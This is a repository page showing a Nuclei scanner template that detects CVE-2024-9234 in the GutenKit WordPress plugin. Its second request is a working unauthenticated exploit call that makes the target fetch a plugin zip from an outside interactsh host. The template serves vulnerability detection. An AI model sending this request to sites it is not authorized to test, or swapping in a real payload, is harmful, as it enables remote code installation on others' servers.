daffainfo
/
nuclei-templates
mirror of https://github.com/daffainfo/nuclei-templates.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity
nuclei-templates/http/cves/2024/CVE-2024-9234.yaml

62 lines
2.3 KiB
YAML
Raw Blame History

id: CVE-2024-9234
info:
name: GutenKit <= 2.1.0 - Arbitrary File Upload
author: s4e-io
severity: critical
description: |
The GutenKit Page Builder Blocks, Patterns, and Templates for Gutenberg Block Editor plugin for WordPress is vulnerable to arbitrary file uploads due to a missing capability check on the install_and_activate_plugin_from_external() function (install-active-plugin REST API endpoint) in all versions up to, and including, 2.1.0. This makes it possible for unauthenticated attackers to install and activate arbitrary plugins, or utilize the functionality to upload arbitrary files spoofed like plugins.
reference:
- https://nvd.nist.gov/vuln/detail/CVE-2024-9234
- https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/gutenkit-blocks-addon/gutenkit-210-unauthenticated-arbitrary-file-upload
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2024-9234
cwe-id: CWE-862
epss-score: 0.00045
epss-percentile: 0.16482
metadata:
verified: true
max-request: 2
vendor: wpmet
product: gutenkit
framework: wordpress
fofa-query: body="wp-content/plugins/gutenkit-blocks-addon"
tags: cve,cve2024,wordpress,wp-plugin,gutenkit,file-upload,intrusive
variables:
filename: "{{rand_text_alpha(12)}}"
flow: http(1) && http(2)
http:
- raw:
- |
GET / HTTP/1.1
Host: {{Hostname}}
matchers:
- type: dsl
dsl:
- 'contains(body, "/wp-content/plugins/gutenkit-blocks-addon")'
- 'status_code == 200'
condition: and
internal: true
- raw:
- |
POST /wp-json/gutenkit/v1/install-active-plugin HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
plugin=http://{{interactsh-url}}/{{filename}}.zip
matchers:
- type: dsl
dsl:
- 'contains_all(body, "Failed to unzip plugin", "success\":false")'
- 'contains(content_type, "application/json")'
- 'status_code == 200'
condition: and
# digest: 4a0a0047304502200d2daecf97ba6353e834406e14ded6bf07ae702591cd8ffd3e45f03704c1e814022100a6aa05e6e862f26d4616b870f54f60b17f263409b4642350d9919e7fd1f657ea:922c64590222798bb761d5b6d8e72950
Reference in New Issue View Git Blame Copy Permalink